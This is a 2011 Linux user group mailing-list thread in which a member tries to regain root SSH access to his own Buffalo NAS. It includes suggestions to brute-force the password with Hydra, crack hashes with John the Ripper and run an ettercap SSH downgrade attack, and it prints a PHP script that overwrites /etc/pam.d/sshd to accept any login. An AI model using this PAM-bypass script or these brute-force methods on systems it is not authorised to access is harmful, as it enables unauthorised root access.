I was not saying you knew the root password just that you knew a password and a corresponding hash to said password and the root hash JTR should be able to get you the correct root password. On 7/17/11, Mark Phillips wrote: > Bryan, > > I think what you are missing is the "...and you know your password...". I > don't know the root password for the NAS box. That is what I am trying to > figure out so I can ssh into the box as root. What I have: > > * Buffalo NAS LS-WXL with firmware rev 1.43 > > * I can ssh as root and get a password prompt. > > * I can ftp into the box as a user that I created, but cannot get to the > filesystem that way. > > * I have downloaded the firmware and unzipped it. One thought is to add a > key to ssh for root and login. Reflashing the unit with firmware that does > not come from the Buffalo site is not well documented, so I have put this > possible solution on hold for the time being. > > * I just found the info about using some type of php exploit, hence my > previous email. I am not a php guy, so I am a little lost on how to make it > work. > > Does this elicit any thoughts on how to crack the root password for this > box? > > Thanks! > > Mark > > On Sun, Jul 17, 2011 at 4:31 PM, Bryan O'Neal < > Bryan.ONeal@theonealandassociates.com> wrote: > >> if you can get a copy of the password hash file. And you know your >> password. Then you should be able to figure out the hash function and >> JTR should give you every password on the box. So... I seem to be >> missing something in this conversation thread. ? >> >> On 7/17/11, Mark Phillips wrote: >> > On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold >> > wrote: >> > >> >> There are alot of password files and dictionary lists on various sites. >> >> Backtrack5 contains a good number. >> >> >> >> But I imagine that it's either not allowing root via ssh or you have >> >> the >> >> wrong username. >> >> >> > >> > It turns out the box is smarter than a fifth grader.....after a few >> > hydra >> > attacks, it started rejecting all the hydra attempts to ssh in via root. >> > Once I stopped hydra (after running all night), it took a couple of >> > hours >> > before it would respond to ssh attempts from root. It now will ask for >> the >> > root password, but I still have no idea what it is. >> > >> >> >> >> Or it's a truely random string. >> >> >> > It could be....the password for the zip file to unzip the file system is >> > >> > YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4 >> > >> > . Someone retrieved it using a disassembler on the file system. >> > >> > I did some more reading, and one person was able to use php to allow ssh >> > login. The box allows one to create a web space, and it comes with php >> > installed. One can edit the php.ini file, and I can upload via ftp a php >> > script. The script they suggested is: >> > > > $file = '../../../../etc/pam.d/sshd'; >> > $fh=fopen($file, 'w') or die("can't open file"); >> > $stringData = "account required pam_unix.so\n"; >> > fwrite($fh, $stringData); >> > $stringData = "session required pam_unix.so\n"; >> > fwrite($fh, $stringData); >> > $stringData = "auth required pam_permit.so\n"; >> > fwrite($fh, $stringData); >> > fclose($fh); >> > ?> >> > >> > I uploaded the script, but I get a 404 File not Found when I access the >> > page. I thought it might be a file permission error since the file is >> only >> > rw. I tried chmod 777 at the ftp prompt, and got the error message File >> not >> > Found, but ls shows it is there. >> > >> > ftp> ls >> > 200 PORT command successful >> > 150 Opening ASCII mode data connection for file list >> > drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin >> > drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs >> > drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log >> > -rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php >> > 226 Transfer complete >> > ftp> chmod 777 script.php >> > 550 CHMOD 777 script.php: No such file or directory >> > ftp> >> > >> > Is there anything I can change in the php.ini file to make this script >> > execute? Or, am I missing something else? >> > >> > BTW, I cannot ftp as root, but I can ftp as a user I created, >> > hammerhead. >> > >> > Thanks, >> > >> > Mark >> > >> >> >> >> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips < >> >> mark@phillipsmarketing.biz> wrote: >> >> >> >>> Since this is a drive buffalo, I might try ettercap ssh downgrade >> attack: >> >>>> >> >>>> http://openmaniak.com/ettercap_filter.php >> >>>> ttp:// >> sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade >> >>>> >> >>>> Not sure how a man in the middle attack will work, since I don't know >> >>>> the >> >>> password to begin with... >> >>> >> >>> Or Hydra: >> >>>> >> >>>> Hydra Instructions: >> >>>> >> >>>> http://www.youtube.com/watch?v=7CP-JB4QARo >> >>>> >> >>>>> >> >>>>>> Hydra is promising. I tried it with the common passwords list from >> >>> openwall. No luck. Do you have any better password lists? >> >>> >> >>> Thanks, >> >>> >> >>> Mark >> >>> >> >>> --------------------------------------------------- >> >>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >> >>> To subscribe, unsubscribe, or to change your mail settings: >> >>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >> >>> >> >> >> >> >> >> >> >> -- >> >> (602) 791-8002 Android >> >> (623) 239-3392 Skype >> >> (623) 688-3392 Google Voice >> >> ** >> >> HomeSmartInternational.com >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> --------------------------------------------------- >> >> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >> >> To subscribe, unsubscribe, or to change your mail settings: >> >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >> >> >> > >> >> -- >> Sent from my mobile device >> --------------------------------------------------- >> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >> To subscribe, unsubscribe, or to change your mail settings: >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >> > -- Sent from my mobile device --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss